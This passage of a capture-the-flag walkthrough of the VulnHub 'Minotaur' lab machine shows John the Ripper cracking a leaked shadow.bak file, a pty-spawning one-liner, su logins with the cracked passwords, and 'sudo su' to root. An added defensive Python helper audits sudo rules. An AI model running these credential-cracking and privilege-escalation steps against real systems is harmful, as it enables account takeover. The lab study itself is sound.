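    print("crackable:", crackable(entries))
    # The /tmp listing in the writeup: -rw-r----- root www-data shadow.bak
    print("shadow.bak exposure:", file_exposure("-rw-r-----", "root", "www-data"))
```

The sha512crypt result matches John's "detected hash type" line further down; the practical lesson for an administrator is that any backup of /etc/shadow, wherever it is copied, needs the same ownership and mode as the original.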

The return of John

I retrieve the shadow.bak file and fire up John for another round.

./john --fork=8 shadow.bak
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
Warning: OpenMP was disabled due to --fork; a non-OpenMP build may be faster
Node numbers 1-8 of 8 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1        (heffer)
obiwan6          (minotaur)

We've now got what (we hope) are two more valid logins for the target.

heffer

Using my favourite Python snippet to upgrade to a proper pty, I su to heffer and check out their home directory, as well as their sudo permissions.

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@minotaur:/tmp$ su heffer
su heffer
Password: Password1

heffer@minotaur:/tmp$ cd /home/heffer
cd /home/heffer
heffer@minotaur:~$ ls -lah
ls -lah
total 28K
drwx------ 3 heffer heffer 4.0K May 27  2015 .
drwxr-xr-x 5 root   root   4.0K May 27  2015 ..
lrwxrwxrwx 1 heffer heffer    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r-- 1 heffer heffer  220 May 27  2015 .bash_logout
-rw-r--r-- 1 heffer heffer 3.6K May 27  2015 .bashrc
drwx------ 2 heffer heffer 4.0K May 27  2015 .cache
-rw------- 1 heffer heffer  107 May 27  2015 flag.txt
-rw-r--r-- 1 heffer heffer  675 May 27  2015 .profile
heffer@minotaur:~$ cat flag.txt
cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0
sudo -l
Matching Defaults entries for heffer on minotaur:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User heffer may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh

Curious - we are able to sudo a script named /root/bullquote.sh. Let's give it a try.

heffer@minotaur:~$ sudo /root/bullquote.sh
sudo /root/bullquote.sh
[sudo] password for heffer: Password1

sudo: /root/bullquote.sh: command not found

Damn, ok... moving on.

minotaur

I repeat the process for minotaur.

www-data@minotaur:/tmp$ su minotaur
su minotaur
Password: obiwan6

minotaur@minotaur:/tmp$ cd /home/minotaur
cd /home/minotaur
minotaur@minotaur:~$ ls -alh
ls -alh
total 36K
drwx------ 4 minotaur minotaur 4.0K May 27  2015 .
drwxr-xr-x 5 root     root     4.0K May 27  2015 ..
lrwxrwxrwx 1 minotaur minotaur    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r-- 1 minotaur minotaur  220 May 14  2015 .bash_logout
-rw-r--r-- 1 minotaur minotaur 3.6K May 14  2015 .bashrc
drwx------ 2 minotaur minotaur 4.0K May 14  2015 .cache
-rw------- 1 minotaur minotaur  107 May 27  2015 flag.txt
-rw-r--r-- 1 minotaur minotaur   22 May 27  2015 .gdbinit
drwxr-xr-x 4 minotaur minotaur 4.0K May 27  2015 peda
-rw-r--r-- 1 minotaur minotaur  675 May 14  2015 .profile
minotaur@minotaur:~$ cat flag.txt
cat flag.txt
Congrats! You've found the first flag:
M355 W17H T3H 8ULL, G37 73H H0RN!

But can you get /root/flag.txt ?
minotaur@minotaur:~$ sudo -l
sudo -l
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL

What's this - we can sudo as any user, for any command? I'll take it!
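Both sudo -l listings above are worth auditing rather than just using: heffer's only rule is NOPASSWD for a script that does not exist, and minotaur holds (ALL : ALL) ALL. Here is an added Python helper, not from the writeup, that parses sudo -l output into rules and flags the patterns seen on this box. The sample input is the two listings from the page; whether a command path exists is injected as a callable so the check runs offline.

```python
import os
import re
from typing import Callable, List, NamedTuple, Tuple

# sudo -l output copied from the two sessions in the writeup.
SUDO_L_HEFFER = r"""
Matching Defaults entries for heffer on minotaur:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User heffer may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
"""

SUDO_L_MINOTAUR = r"""
Matching Defaults entries for minotaur on minotaur:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User minotaur may run the following commands on minotaur:
    (root) NOPASSWD: /root/bullquote.sh
    (ALL : ALL) ALL
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):")
# "(runas) TAG: TAG: command"; tags such as NOPASSWD:/SETENV: are optional
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<command>.+?)\s*$")


class SudoRule(NamedTuple):
    user: str
    runas: str
    tags: Tuple[str, ...]
    command: str


def parse_sudo_l(output: str) -> List[SudoRule]:
    """Extract the rule lines that follow the 'User X may run' header."""
    rules: List[SudoRule] = []
    user = None
    for line in output.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        if user is None or not line.strip():
            continue    # still inside the Defaults block, or a blank line
        r = RULE_RE.match(line)
        if r:
            tags = tuple(t for t in re.split(r":\s*", r.group("tags")) if t)
            rules.append(SudoRule(user, r.group("runas").strip(), tags, r.group("command")))
    return rules


def audit(rules: List[SudoRule],
          exists: Callable[[str], bool] = os.path.exists) -> List[Tuple[str, str]]:
    """Return (finding, detail) pairs for the risky patterns on this box."""
    findings: List[Tuple[str, str]] = []
    for rule in rules:
        if rule.command == "ALL":
            findings.append(("UNRESTRICTED", f"{rule.user} -> ({rule.runas}) ALL"))
            continue
        if "NOPASSWD" in rule.tags:
            findings.append(("NOPASSWD", rule.command))
        if not exists(rule.command.split()[0]):
            # A rule for a path that does not exist is dead weight at best;
            # if its directory were writable by the user, whoever created
            # the file would run it as root, so the rule should be removed.
            findings.append(("MISSING_TARGET", rule.command))
    return findings


if __name__ == "__main__":
    for name, output in (("heffer", SUDO_L_HEFFER), ("minotaur", SUDO_L_MINOTAUR)):
        for kind, detail in audit(parse_sudo_l(output)):
            print(f"[{name}] {kind}: {detail}")
```

Run on a real host the default exists() consults the local filesystem, so the MISSING_TARGET finding reflects the machine the audit runs on; on the box in the writeup it would fire for /root/bullquote.sh, which is exactly why heffer's attempt returned "command not found".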

minotaur@minotaur:~$ sudo su
sudo su
[sudo] password for minotaur: obiwan6

root@minotaur:/home/minotaur# cd /root
cd /root
root@minotaur:~# ls -lah
ls -lah
total 40K
drwx------  5 root root 4.0K May 27  2015 .
drwxr-xr-x 21 root root 4.0K May 14  2015 ..
lrwxrwxrwx  1 root root    9 May 27  2015 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
drwx------  2 root root 4.0K May 15  2015 .cache
-rw-------  1 root root   70 May 27  2015 flag.txt
-rw-------  1 root root   22 May 27  2015 .gdbinit
drwxr-xr-x  4 root root 4.0K May 27  2015 peda
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rwx------  1 root root  845 May 15  2015 quotes.txt
drwx------  2 root root 4.0K May 27  2015 .ssh
root@minotaur:~# cat flag.txt
cat flag.txt
Congrats! You got the final flag!
Th3 Fl@g is: 5urr0nd3d bY @r$3h0l35

Conclusion

Overall, I was surprised at the last step. We had gdb-peda installed, so every part of me expected this to include a binary challenge. All in all, a nice little challenge. I learnt a nice trick for generating wordlists by mutating a pre-existing list, so that was great.

Thanks Robert Winkel for the image, and as always, thank you VulnHub for hosting it!